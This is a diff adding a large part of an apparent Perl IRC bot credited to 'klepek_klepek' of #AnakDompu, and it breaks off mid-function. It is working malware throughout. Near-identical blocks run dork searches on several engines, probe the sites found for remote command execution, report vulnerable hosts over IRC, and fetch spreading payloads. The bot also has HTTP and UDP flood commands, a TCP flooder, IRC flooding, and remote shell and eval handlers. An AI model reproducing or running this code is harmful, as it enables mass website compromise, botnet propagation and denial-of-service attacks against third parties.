+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### SEARCH
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @slist=&search($dork);
+push(my @tot, @slist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### FireBall
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @fireball=fireball($dork);
+push(my @tot, @fireball);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### UOL
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ulist=&uol($dork);
+push(my @tot, @ulist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### ALTAVISTA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alist=&altavista($dork);
+	my @ablist=&altavistade($dork);
+	my @aclist=&altavistaus($dork);
+push(my @tot, @alist,@ablist,@aclist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### HOTBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @hlist=&hotbot($dork);
+	my @hlistb=&hotbotb($dork);
+push(my @tot, @hlist, @hlistb);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MAMMA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @malist=&mamma($dork);
+push(my @tot, @malist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MOZBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mozlist=&mozbot($dork);
+	my @mozlista=&mozbota($dork);
+        my @mozlistb=&mozbotb($dork);
+push(my @tot, @mozlist, @mozlista, @mozlistb);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MozBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MozBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MaZbot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MaZBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### AOL
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @aollist=&aol($dork);
+	my @aollista=&aola($dork);
+	my @aollistb=&aolb($dork);
+	my @aollistc=&aolc($dork);
+push(my @aolbyp,@aollist, @aollista, @aollistb, @aollistc );
+push(my @tot, @aolbyp);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### ASK
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @asklist=&ask($dork);
+	my @asklista=&aska($dork);
+	my @asklistb=&askb($dork);
+push(my @tot, @asklist, @asklista, @asklistb);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################
+#End of EExPreSiSCANNER#
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR] 10 ".$1." 11,10[1Pada Port 80 Untuk] 12 ".$2." Detik .");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR SeLeSaI] 7 ".$1.".");
+}
+######################
+#  End of HTTPFlood  #
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#     UDPFlood       #
+######################
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaJaR]12 ".$1." with 12 ".$2." Kb Packets for 12 ".$3." detik.");
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+$dtime = 1 if $dtime == 0;
+my %bytes;
+$bytes{igmp} = $2 * $pacotes{igmp};
+$bytes{icmp} = $2 * $pacotes{icmp};
+$bytes{o} = $2 * $pacotes{o};
+$bytes{udp} = $2 * $pacotes{udp};
+$bytes{tcp} = $2 * $pacotes{tcp};
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaSiL]12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in12 ".$dtime." seconds to12 ".$1.".");
+}
+exit;
+}
+}
+######################
+#  End of Udpflood   #
+######################
+
+
+sub ircase {
+my ($kem, $printl, $case) = @_;
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+if ($case =~ /^rejoin\s+(.*)/) {
+my $chan = $1;
+if ($chan =~ /^(\d+) (.*)/) {
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+p("$2");
+j("$2");
+}
+}
+else {
+p("$chan");
+j("$chan");
+}
+}
+
+if ($case =~ /^op/) {
+op("$printl", "$kem") if $case eq "op";
+my $oarg = substr($case, 3);
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^deop/) {
+deop("$printl", "$kem") if $case eq "deop";
+my $oarg = substr($case, 5);
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+msg("$1", "$2");
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+msg("$2", "$3");
+}
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+ctcp("$1", "$2");
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+ctcp("$2", "$3");
+}
+}
+
+if ($case =~ /^nick (.*)/) {
+nick("$1");
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+conectar("$2", "$1", 6667);
+}
+
+if ($case =~ /^raw (.*)/) {
+sendraw("$1");
+}
+
+if ($case =~ /^eval (.*)/) {
+eval "$1";
+}
+}
+
+
+sub shell {
+my $printl=$_[0];
+my $comando=$_[1];
+if ($comando =~ /cd (.*)/) {
+chdir("$1") || msg("$printl", "No such file or directory");
+return;
+}
+
+elsif ($pid = fork) {
+waitpid($pid, 0);
+}
+else {
+if (fork) {
+exit;
+
+} else {
+my @resp=`$comando 2>&1 3>&1`;
+my $c=0;
+foreach my $linha (@resp) {
+  $c++;
+  chop $linha;
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+  if ($c == "$linas_max") {
+    $c=0;
+    sleep $sleep;
+  }
+}
+exit;
+}
+}
+}
+
+sub tcpflooder {
+my $itime = time;
+my ($cur_time);
+my ($ia,$pa,$proto,$j,$l,$t);
+$ia=inet_aton($_[0]);
+$pa=sockaddr_in($_[1],$ia);
+$ftime=$_[2];
+$proto=getprotobyname('tcp');
+$j=0;$l=0;
+$cur_time = time - $itime;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+socket($t,PF_INET,SOCK_STREAM,$proto);
+connect($t,$pa)||$j--;
+$j++;$l++;
+}
+$l=0;
+while ($l<1000){
